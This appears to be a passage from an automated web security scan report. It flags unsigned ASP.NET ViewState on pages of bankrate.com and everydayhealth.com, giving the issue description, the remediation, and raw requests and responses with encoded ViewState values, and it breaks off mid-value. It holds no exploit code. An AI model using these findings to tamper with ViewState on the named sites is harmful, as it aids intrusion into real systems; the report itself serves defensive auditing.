http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

9.1. http://www.bankrate.com/funnel/mortgages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQxNTkyMzg4Mg9kFgJmD2QWAgIID2QWBAIWD2QWAgIBD2QWCGYPZBYCZg9kFgQCAQ9kFgJmD2QWBmYPEGQQFTQMU2VsZWN0IFN0YXRlB0FsYWJhbWEGQWxhc2thB0FyaXpvbmEIQXJrYW5zYXMKQ2FsaWZvcm5pYQhDb2xvcmFkbwtDb25uZWN0aWN1dAhEZWxhd2FyZRREaXN0cmljdCBvZiBDb2x1bWJpYQdGbG9yaWRhB0dlb3JnaWEGSGF3YWlpBUlkYWhvCElsbGlub2lzB0luZGlhbmEESW93YQZLYW5zYXMIS2VudHVja3kJTG91aXNpYW5hBU1haW5lCE1hcnlsYW5kDU1hc3NhY2h1c2V0dHMITWljaGlnYW4JTWlubmVzb3RhC01pc3Npc3NpcHBpCE1pc3NvdXJpB01vbnRhbmEITmVicmFza2EGTmV2YWRhDU5ldyBIYW1wc2hpcmUKTmV3IEplcnNleQpOZXcgTWV4aWNvCE5ldyBZb3JrDk5vcnRoIENhcm9saW5hDE5vcnRoIERha290YQRPaGlvCE9rbGFob21hBk9yZWdvbgxQZW5uc3lsdmFuaWEMUmhvZGUgSXNsYW5kDlNvdXRoIENhcm9saW5hDFNvdXRoIERha290YQlUZW5uZXNzZWUFVGV4YXMEVXRhaAdWZXJtb250CFZpcmdpbmlhCldhc2hpbmd0b24NV2VzdCBWaXJnaW5pYQlXaXNjb25zaW4HV3lvbWluZxU0AAJBTAJBSwJBWgJBUgJDQQJDTwJDVAJERQJEQwJGTAJHQQJISQJJRAJJTAJJTgJJQQJLUwJLWQJMQQJNRQJNRAJNQQJNSQJNTgJNUwJNTwJNVAJORQJOVgJOSAJOSgJOTQJOWQJOQwJORAJPSAJPSwJPUgJQQQJSSQJTQwJTRAJUTgJUWAJVVAJWVAJWQQJXQQJXVgJXSQJXWRQrAzRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAg8WAh4Fc3R5bGUFDmRpc3BsYXk6IG5vbmU7ZAIDDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAICD2QWAmYPZBYEZg8PZBYCHgdvbmtleXVwBZABWmlwQ29kZVNlbGVjdG9yLkNoZWNrWmlwQ29kZSh0aGlzLnZhbHVlLCQoJ2N0bDAwX3dlbGxfTW9ydGdhZ2VGdW5uZWxTdGFydF9TdGF0ZUNpdHlaaXBTZWxlY3Rvcl9TdGF0ZUNpdHlaaXBUYWJzX1ppcFRhYl9aaXBDb2RlU2VsZWN0b3JfY3RsMDAnKSk7ZAIBDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAIBDw8WAh4EVGV4dAUGMTY1MDAwZGQCAw8QZGQWAWZkAgQPD2QWAh4Hb25jbGljawVMJCgnYXNwbmV0Rm9ybScpLm9uc3VibWl0PWZ1bmN0aW9uKCl7cmV0dXJuIE1vcnRnYWdlU3RhcnQuVmFsaWRhdGVVcGRhdGUoKTt9O2QCHA9kFgJmD2QWAgIBD2QWAgIBDxYCHwIF2wkNCiA8IS0tIEJsdWVrYWkgUHJvdmlkZXIgVGFncyAtLT4NCiA8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCgkgaWYgKHR5cGVvZihQYWdlTWFuYWdlcikgIT0gInVuZGVmaW5lZCIgICYmIFBhZ2VNYW5hZ2VyIT1udWxsICYmIFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YSE9bnVsbCkNCgkJew0KCQkgdmFyIHBhckxpc3Q9IiI7DQoJCSB2YXIgZXhjTGlzdD0iIjsNCgkJICBpZiAoIVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleSgnQmx1ZUthaVBhcmEnKSkNCgkJCVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5BZGQoJ0JsdWVLYWlQYXJhJywnTG9jYXRpb24sS2V5d29yZHMsQ2F0ZWdvcnknKTsNCg0KCQkgcGFyTGlzdD0gUGFnZU1hbmFnZXIuUGFnZU1ldGFEYXRhLlZhbHVlc1snQmx1ZUthaVBhcmEnXS5zcGxpdCgiLCIpOw0KCQkgZm9yKHZhciBpPTA7IGk8cGFyTGlzdC5sZW5ndGg7IGkrKykNCgkJCXsNCgkJCQkgaWYgKFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleShwYXJMaXN0W2ldKSkNCgkJCQkJCXsNCgkJCQkJCQkgYmtfYWRkUGFnZUN0eChwYXJMaXN0W2ldLFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5WYWx1ZXNbcGFyTGlzdFtpXV0pOw0KCQkJCQkJfQ0KCQkJfSANCgkJCQ0KCQl9DQoJIGlmKCFJc051bGxvclVuZGVmaW5lZChDb29raWVNYW5hZ2VyKSAmJiAhSXNOdWxsb3JVbmRlZmluZWQoQ29va2llTWFuYWdlci5PcGVuKCdicm1iaycpLkdldCgnQktVRCcpKSkgDQoJCXsNCgkJIHZhciB1c2VydmFsPUNvb2tpZU1hbmFnZXIuT3BlbignYnJtYmsnKS5HZXQoJ0JLVUQnKTsNCgkJIGZvcih2YXIgaT0wOyBpPCB1c2VydmFsLnNwbGl0KCcsJykubGVuZ3RoIDsgaSsrKQ0KCQkJCSB7DQoJCQkJICAgaWYodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JykubGVuZ3RoID4gMSAmJiAoSXNOdWxsb3JVbmRlZmluZWQoZXhjTGlzdCkgfHwgZXhjTGlzdC5zcGxpdCgnLCcpLmluZGV4T2YodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JylbMF0pIDwgMCApKQ0KCQkJCQkJCSBia19hZGRVc2VyQ3R4KHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzBdLHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzFdKTsNCgkJCSB9DQoJCQkgQ29va2llTWFuYWdlci5EZWxldGUoJ2JybWJrJyk7DQoJCX0NCgkgYmtfZG9KU1RhZygyMzExLCA0KTsNCgkgPC9zY3JpcHQ+DQo8IS0tIEVuZCBCbHVla2FpIFRhZ3MgLS0+ZGQ=" />
...[SNIP]...

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAX7Bg0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJDYW4gQ2xpbWF0ZSBDaGFuZ2UgQ2F1c2UgQWxsZXJneT8gLSBBbGxlcmd5IENlbnRlciAtIEV2ZXJ5ZGF5IEhlYWx0aCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiAgcnVuYXQ9InNlcnZlciIgIGlkPSJmYmRlc2NyaXB0aW9uIiBjb250ZW50PSJHbG9iYWwgd2FybWluZyBjb3VsZCBiZSBhZ2dyYXZhdGluZyB5b3VyIGFsbGVyZ2llcy4gR2V0IGFkdmljZSBvbiBob3cgdG8gZWFzZSBzeW1wdG9tcyBhbmQgY2FyZSBmb3IgYWxsZXJnaWVzIGluIHRvZGF5J3MgZW52aXJvbm1lbnQgYXQgRXZlcnlkYXkgSGVhbHRoLiIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ3kvY2xpbWF0ZS1jaGFuZ2UtYW5kLWFsbGVyZ2llcy5hc3B4IiAvPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29ubmVjdC5mYWNlYm9vay5uZXQvZW5fVVMvYWxsLmpzI3hmYm1sPTEiPjwvc2NyaXB0PmQCAw9kFgICAQ9kFgICAg9kFghmD2QWBGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCAgEPZBYCZg8PFgQeCENzc0NsYXNzBQp2ZXJ0aWNhbGFkHgRfIVNCAgJkZAICD2QWAgIBD2QWBAIBDw8WAh8ABQ5OZXh0IEFydGljbGU6IGRkAgMPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAVaaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoeS1saXZpbmcvMDIyNS9nbG9iYWwtd2FybWluZy1tYXktcG9zZS1kZWF0aC1yaXNrcy5hc3B4ZBYCZg8VASdHbG9iYWwgICBXYXJtaW5nICBNYXkgUG9zZSBIZWFsdGggUmlza3NkAgMPZBYGAgEPZBYEAgEPDxYCHwAFHVJlbGF0ZWQgQXJ0aWNsZXMgb24gQWxsZXJnaWVzZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFWmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aHktbGl2aW5nLzAyMjUvZ2xvYmFsLXdhcm1pbmctbWF5LXBvc2UtZGVhdGgtcmlza3MuYXNweGQWAmYPFQEnR2xvYmFsICAgV2FybWluZyAgTWF5IFBvc2UgSGVhbHRoIFJpc2tzZAIBD2QWAgIBDw8WAh8FBVlodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9hbGxlcmdpZXMvc3BlY2lhbGlzdHMvaG93LWRvLWktdGVzdC1mb3ItZm9vZC1hbGxlcmdpZXMuYXNweGQWAmYPFQEjSG93IERvIEkgVGVzdCBGb3IgRm9vZCAgQWxsZXJnaWVzID9kAgIPZBYCAgEPDxYCHwUFQmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ2llcy9hbGxlcmd5LWJsb29kLXRlc3RpbmcuYXNweGQWAmYPFQEcQmxvb2QgVGVzdGluZyBGb3IgIEFsbGVyZ2llc2QCAg9kFgQCAQ8PFgIfAAUbTW9yZSBvbiBBbGxlcmd5IE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFMWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcXVpLWFsbGVyZ3lkFgJmDxUBDkxpcXVpLSBBbGxlcmd5ZAIBD2QWAgIBDw8WAh8FBTNodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9kYXlxdWlsLWFsbGVyZ3lkFgJmDxUBEERheXF1aWwgIEFsbGVyZ3lkAgIPZBYCAgEPDxYCHwUFNGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2JlbmFkcnlsLWFsbGVyZ3lkFgJmDxUBEUJlbmFkcnlsICBBbGxlcmd5ZAIDD2QWBAIBDw8WAh8ABRtBc2sgYSBQaGFybWFjaXN0OiBBbGxlcmdpZXNkZAIDDxYCHwQCAxYGZg9kFgICAQ8PFgIfBQV4aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoLXF1ZXN0aW9ucy9kaXVyZXRpY3Mvd2hpY2gtZGl1cmV0aWNzLWNhbi15b3UtdGFrZS1pZi15b3UtYXJlLWFsbGVyZ2ljLXRvLXN1bGZhLWRydWdzZBYCZg8VAUBXaGljaCBEaXVyZXRpY3MgQ2FuIFlvdSBUYWtlIElmIFlvdSBBcmUgQWxsZXJnaWMgVG8gU3VsZmEgRHJ1Z3M/ZAIBD2QWAgIBDw8WAh8FBWxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhZmZlaW5lL3doYXQtYXJlLXNvbWUtb2YtdGhlLWFsbGVyZ2ljLXN5bXB0b21zLWZyb20tY2FmZmVpbmVkFgJmDxUBNVdoYXQgQXJlIFNvbWUgT2YgVGhlIEFsbGVyZ2ljIFN5bXB0b21zIEZyb20gQ2FmZmVpbmU/ZAICD2QWAgIBDw8WAh8FBW9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2FzdGVwcm8vY2FuLWFzdGVwcm8td2VpZ2h0LWdhaW4tY2FuLXNpbmd1bGFpci1jYXVzZS13ZWlyZC1kcmVhbXNkFgJmDxUBOkNhbiBBc3RlcHJvIFdlaWdodCBHYWluPyBDYW4gU2luZ3VsYWlyIENhdXNlIFdlaXJkIERyZWFtcz9kAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJJcyBDaG9sZXN0ZXJvbCBUcmVhdG1lbnQgV29ydGggSXQ/IC0gRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1lZGljYXRpb25zLCBkaWV0LCBleGVyY2lzZSwgb3IgYWxsIHRocmVlIGNhbiB1c3VhbGx5IG1hbmFnZSBjaG9sZXN0ZXJvbC4gU28gaWYgZGlldCBhbmQgZXhlcmNpc2UgY2FuIGxvd2VyIGhpZ2ggY2hvbGVzdGVyb2wsIGlzIG1lZGljYXRpb24gbmVjZXNzYXJ5PyIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYXJ0LWRpc2Vhc2UvY2hvbGVzdGVyb2wvZHJ1Zy10cmVhdG1lbnRzLWZvci1oaWdoLWNob2xlc3Rlcm9sLmFzcHgiIC8+DQoNCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb25uZWN0LmZhY2Vib29rLm5ldC9lbl9VUy9hbGwuanMjeGZibWw9MSI+PC9zY3JpcHQ+ZAIDD2QWAgIBD2QWAgICD2QWCGYPZBYEZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDw8WBB4IQ3NzQ2xhc3MFCnZlcnRpY2FsYWQeBF8hU0ICAmRkAgIPZBYCAgEPZBYEAgEPDxYCHwAFDk5leHQgQXJ0aWNsZTogZGQCAw8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBU5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oaWdoLWNob2xlc3Rlcm9sL2hpZ2gtY2hvbGVzdGVyb2wtdHJlYXRtZW50LmFzcHhkFgJmDxUBHkhpZ2ggICBDaG9sZXN0ZXJvbCAgIFRyZWF0bWVudGQCAw9kFgYCAg9kFgQCAQ8PFgIfAAUkUmVsYXRlZCBBcnRpY2xlcyBvbiBIaWdoIENob2xlc3Rlcm9sZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFTmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hpZ2gtY2hvbGVzdGVyb2wvaGlnaC1jaG9sZXN0ZXJvbC10cmVhdG1lbnQuYXNweGQWAmYPFQEeSGlnaCAgIENob2xlc3Rlcm9sICAgVHJlYXRtZW50ZAIBD2QWAgIBDw8WAh8FBVpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFydC1kaXNlYXNlL2Nob2xlc3Rlcm9sL3Rha2luZy1hbi1pbmRpdmlkdWFsLWFwcHJvYWNoLmFzcHhkFgJmDxUBN1doeSAgQ2hvbGVzdGVyb2wgICBUcmVhdG1lbnQgIElzIERpZmZlcmVudCBGb3IgRXZlcnlvbmVkAgIPZBYCAgEPDxYCHwUFV2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1jZW50ZXIvaGlnaC1jaG9sZXN0ZXJvbC1zaG91bGQtaS10YWtlLXN0YXRpbnMuYXNweGQWAmYPFQEtSGlnaCAgIENob2xlc3Rlcm9sIDogU2hvdWxkIEkgVGFrZSAgU3RhdGlucyA/ZAIDD2QWBAIBDw8WAh8ABR9Nb3JlIG9uIENob2xlc3Rlcm9sIE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFK2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcGl0b3JkFgJmDxUBB0xpcGl0b3JkAgEPZBYCAgEPDxYCHwUFKWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL3pldGlhZBYCZg8VAQVaZXRpYWQCAg9kFgICAQ8PFgIfBQU2aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vZHJ1Z3MvY29lbnp5bWUtcTEwLWNvcTEwZBYCZg8VARRDb2VuenltZSBRMTAgKENvcTEwKWQCBA9kFgQCAQ8PFgIfAAUiQXNrIGEgUGhhcm1hY2lzdDogSGlnaCBDaG9sZXN0ZXJvbGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBX9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL25pZ2h0bWFyZXMvaS1oYXZlLXRha2VuLWxpcGl0b3ItYXRlbm9sb2wtc3RhdGlucy1hbmQtcHJvemFjLWZvci15ZWFycy1hcy13ZWxsLWFzZBYCZg8VAWFJIEhhdmUgVGFrZW4gTGlwaXRvciwgQXRlbm9sb2wsICBTdGF0aW5zICwgQW5kIFByb3phYyBGb3IgWWVhcnMsIEFzIFdlbGwgQXMgVml0YW1pbiBEIEFuZCBDYWxjaXVtZAIBD2QWAgIBDw8WAh8FBW5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhcmRpemVtL2lzLWNhcmRpemVtLXRoZS1iZXN0LW1lZGljYXRvbi1mb3ItYXRyaWFsLWZpYnJpbGxhdGlvbmQWAmYPFQE3SXMgQ2FyZGl6ZW0gVGhlIEJlc3QgTWVkaWNhdG9uIEZvciBBdHJpYWwgRmlicmlsbGF0aW9uP2QCAg9kFgICAQ8PFgIfBQWBAWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1xdWVzdGlvbnMvc3RvbWFjaC11cHNldC93aGljaC1vZi10aGVzZS1tZWRpY2F0aW9ucy1pcy1jYXVzaW5nLW15LXN0b21hY2gtcHJvYmxlbXMtbGlzaW5vcHJpbGQWAmYPFQFqV2hpY2ggT2YgVGhlc2UgTWVkaWNhdGlvbnMgSXMgQ2F1c2luZyBNeSBTdG9tYWNoIFByb2JsZW1zLCBMaXNpbm9wcmlsLCBNZXRmb3JtaW4sIFByYXZhc3RhdGluLCBPciBBc3BpcmluP2QCBw9kFgICAQ9kFgICAg8PFgIfAWhkZGQ=" />
...[SNIP]...

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGCA0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJUVnMgQ29tbW9uIGluIERheWNhcmUgQ2VudGVycyBEZXNwaXRlIEd1aWRlbGluZXMgLSBLaWRzJyBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1vcmUgdGhhbiB0d28tdGhpcmRzIG9mIGRheWNhcmUgY2VudGVycyBpbmNsdWRlZCBpbiBhIG5ldyBVLlMuIHN0dWR5IGhhdmUgVFZzIGF2YWlsYWJsZSBmb3IgY2hpbGRyZW4gdG8gd2F0Y2gsIGFuZCBuZWFybHkgNjAgcGVyY2VudCBvZiB0aGUgY2VudGVycyBpZ25vcmVkIHRoZSBBbWVyaWNhbiBBY2FkZW15IG9mIFBlZGlhdHJpY3MnIGd1aWRlbGluZXMgZm9yIHRlbGV2aXNpb24gZXhwb3N1cmUgaW4geW91bmcga2lkcy4iID4NCjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJhcnRpY2xlIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vaW1hZ2VzLmFnb3JhbWVkaWEuY29tL2V2ZXJ5ZGF5aGVhbHRoL2djbXMvbG9nb19laF81MHg1MC5naWYiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6c2l0ZV9uYW1lIiBjb250ZW50PSJFdmVyeWRheUhlYWx0aC5jb20iLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphcHBfaWQiIGNvbnRlbnQ9IjEzNTM0NjAzNjQ5MDE4NiIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFkbWlucyIgY29udGVudD0iIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgcnVuYXQ9InNlcnZlciIgaWQ9ImZidXJsIiBjb250ZW50PSJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9raWRzLWhlYWx0aC8wNTA0L3R2cy1jb21tb24taW4tZGF5Y2FyZS1jZW50ZXJzLWZsb3V0aW5nLWd1aWRlbGluZXMuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3J